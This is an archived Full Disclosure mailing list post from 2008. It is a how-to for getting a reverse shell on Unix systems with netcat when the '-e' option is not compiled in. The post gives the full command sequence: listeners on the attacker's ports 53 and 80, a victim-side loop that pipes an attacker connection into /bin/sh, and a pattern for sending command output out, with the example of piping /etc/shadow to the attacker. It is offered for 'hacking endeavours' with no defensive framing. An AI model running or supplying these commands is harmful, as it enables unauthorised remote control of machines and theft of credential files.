Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE"
From: 545945 <545945 () gmail com>
Date: Fri, 19 Sep 2008 18:01:23 -0400

     Recently a friend of mine asked me a seemingly simple question.  What
is the easiest method to get a reverse shell from a *nix based system using
Netcat.  He then added a caveat, that he did not want worry about
recompiling the source to enable the "GAPING_SECURITY_HOLE" option that
allows you to bind a shell using "-e".  My first thought was to say "Dude go
check Google and stop bothering me with this piddly shit", however I have in
the past had this same discussion with others and trying to construct a
Google search string and get meaningful results on this subject can prove
very irritating.  Because of this I gave in and told him the method I use
which is laid out below.  I then had the thought that I should post it
somewhere else so it was a little easier for the next person to find.  I say
"somewhere else" because I can only assume that I am not the first person to
post this method.

     While the method below does not provide a "TRUE" interactive shell it
is the next best thing and is more than suitable for most hacking
endeavours, including simple interactive steps like setting passwords.  I
know there are other methods out there but I like this one as it provides an
easy method without worrying if any particular scripting language was
installed or the proper options were compiled in with the default shell.
There will undoubtedly be debate on what the best ports are to use and
whether or not this is even a recommended way to do things.  I chose ports
53 & 80 as they are the ones that I find have the most success of getting
out of a network untouched.  As with all things any number of factors can
get in the way of proper communication using this method.

STEP (1)
On the attacker host open a terminal window that you want to receive the
output of your commands in and run.
     "nc -k -v -l 80"

STEP (2)
On the attacker host open a terminal window that you want to enter in your
commands and run.
     "nc -k -v -l 53"

STEP (3)
On the victim host run.
     "while true ; do nc <Attacker_IP> 53 | /bin/sh ; done"

You should then see a message appear in the window opened in STEP (2)
similar to - "Connection from <Victim_IP> port 53 accepted"

NOTE:  I use the "-k" options and "while loops" in these steps to ensure
that if there is any intermittent communication issues I don't have to
re-establish any of the sessions.

     Assuming that there are no communication issues like firewalls,
routing, DNS, PEBCAK errors, etc...getting in the way, then the command you
entered in STEP (3) will connect to the session started in STEP (2).  "Great
now what?" you ask.  Well all you do is enter the commands you want to run
in the STEP (2) window using the formatting below and the output will
display in the window opened for STEP (1)

Syntax :   <command> | nc <Attacker_IP> 80

Example:   cat /etc/shadow | nc 80

There are lots of variations on this using multiple hosts and single ports
but I leave that up to you to experiment.  That's it and happy hunting...

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]